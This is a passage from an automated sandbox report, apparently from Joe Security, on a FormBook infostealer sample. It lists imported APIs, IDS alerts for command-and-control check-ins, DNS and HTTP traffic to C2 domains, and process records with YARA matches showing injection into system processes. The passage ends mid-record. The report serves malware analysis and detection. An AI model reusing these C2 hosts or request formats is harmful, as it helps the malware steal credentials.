WideCharToMultiByte, LocalAlloc, GetConsoleOutputCP, GetProcAddress, LocaleNameToLCID, LCMapStringEx, EnumTimeFormatsEx, EnumCalendarInfoExEx, CreateFileW, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, DeleteFileW, DeviceIoControl, ExpandEnvironmentStringsW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetFileAttributesExW, GetFileInformationByHandleEx, GetFileType, GetModuleFileNameW, GetOverlappedResult, LoadLibraryExW, ReadFile, SetFileInformationByHandle, SetThreadErrorMode, GetThreadPriority, SetThreadPriority, WriteFile, GetCurrentProcessorNumberEx, SetEvent, CreateEventExW, GetEnvironmentVariableW, FlushProcessWriteBuffers, WaitForSingleObjectEx, RtlVirtualUnwind, RtlCaptureContext, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, TerminateProcess, SwitchToThread, CreateThread, GetCurrentThreadId, SuspendThread, ResumeThread, GetThreadContext, SetThreadContext, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, VirtualQuery, GetSystemTimeAsFileTime, ResetEvent, DebugBreak, WaitForSingleObject, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RaiseException, RtlPcToFileHeader, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, RtlLookupFunctionEntry, InitializeSListHead
ole32.dll	CoGetApartmentType, CoTaskMemAlloc, CoUninitialize, CoInitializeEx, CoTaskMemFree, CoWaitForMultipleHandles
api-ms-win-crt-heap-l1-1-0.dll	malloc, free, _callnewh, calloc, _set_new_mode
api-ms-win-crt-math-l1-1-0.dll	__setusermatherr
api-ms-win-crt-string-l1-1-0.dll	strcmp, _stricmp, strcpy_s, strncpy_s, wcsncmp
api-ms-win-crt-convert-l1-1-0.dll	strtoull
api-ms-win-crt-runtime-l1-1-0.dll	__p___wargv, _cexit, exit, terminate, _crt_atexit, _register_onexit_function, _initialize_onexit_table, __p___argc, _exit, abort, _initterm_e, _c_exit, _register_thread_local_exe_atexit_callback, _seh_filter_exe, _set_app_type, _initterm, _configure_wide_argv, _initialize_wide_environment, _get_initial_wide_environment
api-ms-win-crt-stdio-l1-1-0.dll	__stdio_common_vsprintf_s, __stdio_common_vfprintf, __p__commode, _set_fmode, __stdio_common_vsscanf, __acrt_iob_func
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-09T12:32:56.588967+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49994	3.33.130.190	80	TCP
2024-10-09T12:32:56.588967+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49994	3.33.130.190	80	TCP
2024-10-09T12:32:56.588967+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49994	3.33.130.190	80	TCP
2024-10-09T12:32:56.588967+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49991	172.96.187.89	80	TCP
2024-10-09T12:32:56.588967+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49991	172.96.187.89	80	TCP
2024-10-09T12:32:56.588967+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49991	172.96.187.89	80	TCP
2024-10-09T12:33:41.057307+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49900	103.235.47.188	80	TCP
2024-10-09T12:33:41.057307+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49900	103.235.47.188	80	TCP
2024-10-09T12:33:41.057307+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49900	103.235.47.188	80	TCP
2024-10-09T12:34:40.120774+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49988	104.18.14.105	80	TCP
2024-10-09T12:34:40.120774+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49988	104.18.14.105	80	TCP
2024-10-09T12:34:40.120774+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49988	104.18.14.105	80	TCP
2024-10-09T12:36:43.677634+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49992	44.227.65.245	80	TCP
2024-10-09T12:36:43.677634+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49992	44.227.65.245	80	TCP
2024-10-09T12:36:43.677634+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49992	44.227.65.245	80	TCP
2024-10-09T12:37:07.424803+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49993	118.27.100.151	80	TCP
2024-10-09T12:37:07.424803+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49993	118.27.100.151	80	TCP
2024-10-09T12:37:07.424803+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49993	118.27.100.151	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 9, 2024 12:33:40.485089064 CEST	49900	80	192.168.2.6	103.235.47.188
Oct 9, 2024 12:33:40.490004063 CEST	80	49900	103.235.47.188	192.168.2.6
Oct 9, 2024 12:33:40.490106106 CEST	49900	80	192.168.2.6	103.235.47.188
Oct 9, 2024 12:33:40.490159988 CEST	49900	80	192.168.2.6	103.235.47.188
Oct 9, 2024 12:33:40.495204926 CEST	80	49900	103.235.47.188	192.168.2.6
Oct 9, 2024 12:33:40.995414019 CEST	49900	80	192.168.2.6	103.235.47.188
Oct 9, 2024 12:33:41.043732882 CEST	80	49900	103.235.47.188	192.168.2.6
Oct 9, 2024 12:33:41.057113886 CEST	80	49900	103.235.47.188	192.168.2.6
Oct 9, 2024 12:33:41.057307005 CEST	49900	80	192.168.2.6	103.235.47.188
Oct 9, 2024 12:34:39.634556055 CEST	49988	80	192.168.2.6	104.18.14.105
Oct 9, 2024 12:34:39.639595032 CEST	80	49988	104.18.14.105	192.168.2.6
Oct 9, 2024 12:34:39.639676094 CEST	49988	80	192.168.2.6	104.18.14.105
Oct 9, 2024 12:34:39.639781952 CEST	49988	80	192.168.2.6	104.18.14.105
Oct 9, 2024 12:34:39.644768953 CEST	80	49988	104.18.14.105	192.168.2.6
Oct 9, 2024 12:34:40.119968891 CEST	80	49988	104.18.14.105	192.168.2.6
Oct 9, 2024 12:34:40.120281935 CEST	49988	80	192.168.2.6	104.18.14.105
Oct 9, 2024 12:34:40.120718956 CEST	80	49988	104.18.14.105	192.168.2.6
Oct 9, 2024 12:34:40.120774031 CEST	49988	80	192.168.2.6	104.18.14.105
Oct 9, 2024 12:34:40.125361919 CEST	80	49988	104.18.14.105	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 9, 2024 12:33:39.106441021 CEST	62461	53	192.168.2.6	1.1.1.1
Oct 9, 2024 12:33:40.104801893 CEST	62461	53	192.168.2.6	1.1.1.1
Oct 9, 2024 12:33:40.483974934 CEST	53	62461	1.1.1.1	192.168.2.6
Oct 9, 2024 12:33:40.484014034 CEST	53	62461	1.1.1.1	192.168.2.6
Oct 9, 2024 12:33:58.996097088 CEST	58913	53	192.168.2.6	1.1.1.1
Oct 9, 2024 12:33:59.036238909 CEST	53	58913	1.1.1.1	192.168.2.6
Oct 9, 2024 12:34:19.208017111 CEST	61043	53	192.168.2.6	1.1.1.1
Oct 9, 2024 12:34:19.228391886 CEST	53	61043	1.1.1.1	192.168.2.6
Oct 9, 2024 12:34:39.417354107 CEST	61323	53	192.168.2.6	1.1.1.1
Oct 9, 2024 12:34:39.458134890 CEST	53	61323	1.1.1.1	192.168.2.6
Oct 9, 2024 12:35:00.074340105 CEST	57069	53	192.168.2.6	1.1.1.1
Oct 9, 2024 12:35:00.186707020 CEST	53	57069	1.1.1.1	192.168.2.6
Oct 9, 2024 12:35:20.816768885 CEST	59521	53	192.168.2.6	1.1.1.1
Oct 9, 2024 12:35:21.322597980 CEST	53	59521	1.1.1.1	192.168.2.6
Oct 9, 2024 12:35:41.226614952 CEST	64761	53	192.168.2.6	1.1.1.1
Oct 9, 2024 12:35:41.236011028 CEST	53	64761	1.1.1.1	192.168.2.6
Oct 9, 2024 12:36:01.847003937 CEST	56976	53	192.168.2.6	1.1.1.1
Oct 9, 2024 12:36:01.866771936 CEST	53	56976	1.1.1.1	192.168.2.6
Oct 9, 2024 12:36:22.471308947 CEST	58322	53	192.168.2.6	1.1.1.1
Oct 9, 2024 12:36:22.844423056 CEST	53	58322	1.1.1.1	192.168.2.6
Oct 9, 2024 12:36:43.138528109 CEST	50808	53	192.168.2.6	1.1.1.1
Oct 9, 2024 12:36:43.161221027 CEST	53	50808	1.1.1.1	192.168.2.6
Oct 9, 2024 12:37:03.699738026 CEST	57117	53	192.168.2.6	1.1.1.1
Oct 9, 2024 12:37:04.237265110 CEST	53	57117	1.1.1.1	192.168.2.6
Oct 9, 2024 12:37:25.527566910 CEST	51785	53	192.168.2.6	1.1.1.1
Oct 9, 2024 12:37:25.546631098 CEST	53	51785	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 9, 2024 12:33:39.106441021 CEST	192.168.2.6	1.1.1.1	0x33d2	Standard query (0)	www.zruypj169g.top	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:33:40.104801893 CEST	192.168.2.6	1.1.1.1	0x33d2	Standard query (0)	www.zruypj169g.top	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:33:58.996097088 CEST	192.168.2.6	1.1.1.1	0x7abc	Standard query (0)	www.teplo-invest.com	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:34:19.208017111 CEST	192.168.2.6	1.1.1.1	0x9a78	Standard query (0)	www.zbbnp.xyz	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:34:39.417354107 CEST	192.168.2.6	1.1.1.1	0xcab8	Standard query (0)	www.33mgbet.com	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:35:00.074340105 CEST	192.168.2.6	1.1.1.1	0x4366	Standard query (0)	www.a1b5v.xyz	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:35:20.816768885 CEST	192.168.2.6	1.1.1.1	0x8a31	Standard query (0)	www.lynxpire.com	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:35:41.226614952 CEST	192.168.2.6	1.1.1.1	0xa100	Standard query (0)	www.chiri.lat	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:36:01.847003937 CEST	192.168.2.6	1.1.1.1	0x7ff1	Standard query (0)	www.rslotrank.win	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:36:22.471308947 CEST	192.168.2.6	1.1.1.1	0xa7d1	Standard query (0)	www.partymaxclubmen36.click	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:36:43.138528109 CEST	192.168.2.6	1.1.1.1	0xe8ac	Standard query (0)	www.tdshomesolution.com	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:37:03.699738026 CEST	192.168.2.6	1.1.1.1	0x4430	Standard query (0)	www.onsen1508.com	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:37:25.527566910 CEST	192.168.2.6	1.1.1.1	0xca0b	Standard query (0)	www.barnesassetrecovery.store	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 9, 2024 12:33:40.483974934 CEST	1.1.1.1	192.168.2.6	0x33d2	No error (0)	www.zruypj169g.top	www.baidu.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 9, 2024 12:33:40.483974934 CEST	1.1.1.1	192.168.2.6	0x33d2	No error (0)	www.baidu.com	www.a.shifen.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 9, 2024 12:33:40.483974934 CEST	1.1.1.1	192.168.2.6	0x33d2	No error (0)	www.a.shifen.com	www.wshifen.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 9, 2024 12:33:40.483974934 CEST	1.1.1.1	192.168.2.6	0x33d2	No error (0)	www.wshifen.com		103.235.47.188	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:33:40.483974934 CEST	1.1.1.1	192.168.2.6	0x33d2	No error (0)	www.wshifen.com		103.235.46.96	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:33:40.484014034 CEST	1.1.1.1	192.168.2.6	0x33d2	No error (0)	www.zruypj169g.top	www.baidu.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 9, 2024 12:33:40.484014034 CEST	1.1.1.1	192.168.2.6	0x33d2	No error (0)	www.baidu.com	www.a.shifen.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 9, 2024 12:33:40.484014034 CEST	1.1.1.1	192.168.2.6	0x33d2	No error (0)	www.a.shifen.com	www.wshifen.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 9, 2024 12:33:40.484014034 CEST	1.1.1.1	192.168.2.6	0x33d2	No error (0)	www.wshifen.com		103.235.47.188	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:33:40.484014034 CEST	1.1.1.1	192.168.2.6	0x33d2	No error (0)	www.wshifen.com		103.235.46.96	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:33:59.036238909 CEST	1.1.1.1	192.168.2.6	0x7abc	Name error (3)	www.teplo-invest.com	none	none	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:34:19.228391886 CEST	1.1.1.1	192.168.2.6	0x9a78	Name error (3)	www.zbbnp.xyz	none	none	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:34:39.458134890 CEST	1.1.1.1	192.168.2.6	0xcab8	No error (0)	www.33mgbet.com	cbmsource-web-5091.rejcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 9, 2024 12:34:39.458134890 CEST	1.1.1.1	192.168.2.6	0xcab8	No error (0)	cbmsource-web-5091.rejcdn.com		104.18.14.105	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:34:39.458134890 CEST	1.1.1.1	192.168.2.6	0xcab8	No error (0)	cbmsource-web-5091.rejcdn.com		104.18.15.105	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:35:00.186707020 CEST	1.1.1.1	192.168.2.6	0x4366	Name error (3)	www.a1b5v.xyz	none	none	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:35:21.322597980 CEST	1.1.1.1	192.168.2.6	0x8a31	Name error (3)	www.lynxpire.com	none	none	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:35:41.236011028 CEST	1.1.1.1	192.168.2.6	0xa100	Name error (3)	www.chiri.lat	none	none	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:36:01.866771936 CEST	1.1.1.1	192.168.2.6	0x7ff1	Name error (3)	www.rslotrank.win	none	none	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:36:22.844423056 CEST	1.1.1.1	192.168.2.6	0xa7d1	No error (0)	www.partymaxclubmen36.click	partymaxclubmen36.click		CNAME (Canonical name)	IN (0x0001)	false
Oct 9, 2024 12:36:22.844423056 CEST	1.1.1.1	192.168.2.6	0xa7d1	No error (0)	partymaxclubmen36.click		172.96.187.89	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:36:43.161221027 CEST	1.1.1.1	192.168.2.6	0xe8ac	No error (0)	www.tdshomesolution.com	pixie.porkbun.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 9, 2024 12:36:43.161221027 CEST	1.1.1.1	192.168.2.6	0xe8ac	No error (0)	pixie.porkbun.com		44.227.65.245	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:36:43.161221027 CEST	1.1.1.1	192.168.2.6	0xe8ac	No error (0)	pixie.porkbun.com		44.227.76.166	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:37:04.237265110 CEST	1.1.1.1	192.168.2.6	0x4430	No error (0)	www.onsen1508.com		118.27.100.151	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:37:25.546631098 CEST	1.1.1.1	192.168.2.6	0xca0b	No error (0)	www.barnesassetrecovery.store	barnesassetrecovery.store		CNAME (Canonical name)	IN (0x0001)	false
Oct 9, 2024 12:37:25.546631098 CEST	1.1.1.1	192.168.2.6	0xca0b	No error (0)	barnesassetrecovery.store		3.33.130.190	A (IP address)	IN (0x0001)	false
Oct 9, 2024 12:37:25.546631098 CEST	1.1.1.1	192.168.2.6	0xca0b	No error (0)	barnesassetrecovery.store		15.197.148.33	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.zruypj169g.top

www.33mgbet.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49900	103.235.47.188	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 12:33:40.490159988 CEST	181	OUT	GET /md02/?oHH8=VZUPDXU8mXkToFn&0PG4QdD=KBMih/6UmjMCLIvQj8A+JVJ0ZduXlvkac/jrKRN7UGcA2YCWIWeuvW479UURmW6VwJBRFqK2PA== HTTP/1.1 Host: www.zruypj169g.top Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49988	104.18.14.105	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 12:34:39.639781952 CEST	178	OUT	GET /md02/?0PG4QdD=t+COfq1vjUEJQNGKuIffQF6Jo9EOeFI2rokLIpdDcdgn8qfouM+tADvwOSJNkXtOfnwg5pSvDA==&oHH8=VZUPDXU8mXkToFn HTTP/1.1 Host: www.33mgbet.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 9, 2024 12:34:40.119968891 CEST	820	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 09 Oct 2024 10:34:40 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Wed, 09 Oct 2024 11:34:40 GMT Location: https://www.33mgbet.com/md02/?0PG4QdD=t+COfq1vjUEJQNGKuIffQF6Jo9EOeFI2rokLIpdDcdgn8qfouM+tADvwOSJNkXtOfnwg5pSvDA==&oHH8=VZUPDXU8mXkToFn Set-Cookie: __cf_bm=Rc58U8.G.iqfDKM1KAycU.0EnlUwOqFCNKO2LyxheqQ-1728470080-1.0.1.1-.0BV1hY2eamOZxMCgNxVtzadDeMDPlL3sB9nrkWGR5Dzt4AkCJLiO8zusInuiu7lWZk5Yow043JvgUrgG25CkA; path=/; expires=Wed, 09-Oct-24 11:04:40 GMT; domain=.www.33mgbet.com; HttpOnly Server: cloudflare CF-RAY: 8cfdb8305e2b2361-EWR Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Target ID:	0
Start time:	06:32:58
Start date:	09/10/2024
Path:	C:\Users\user\Desktop\Iifpj4i2kC.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Iifpj4i2kC.exe"
Imagebase:	0x7ff67fa40000
File size:	1'627'744 bytes
MD5 hash:	F6E047942236CEFDCD6559BCA66A7B3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	06:32:58
Start date:	09/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:32:58
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\System32\svchost.exe"
Imagebase:
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	06:32:59
Start date:	09/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\System32\cmd.exe"
Imagebase:
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	06:32:59
Start date:	09/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Imagebase:	0x870000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:33:00
Start date:	09/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff609140000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000006.00000002.4578868311.000000000E24E000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	06:33:03
Start date:	09/10/2024
Path:	C:\Windows\SysWOW64\wlanext.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\wlanext.exe"
Imagebase:	0xfd0000
File size:	78'336 bytes
MD5 hash:	0D5F0A7CA2A8A47E3A26FB1CB67E118C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 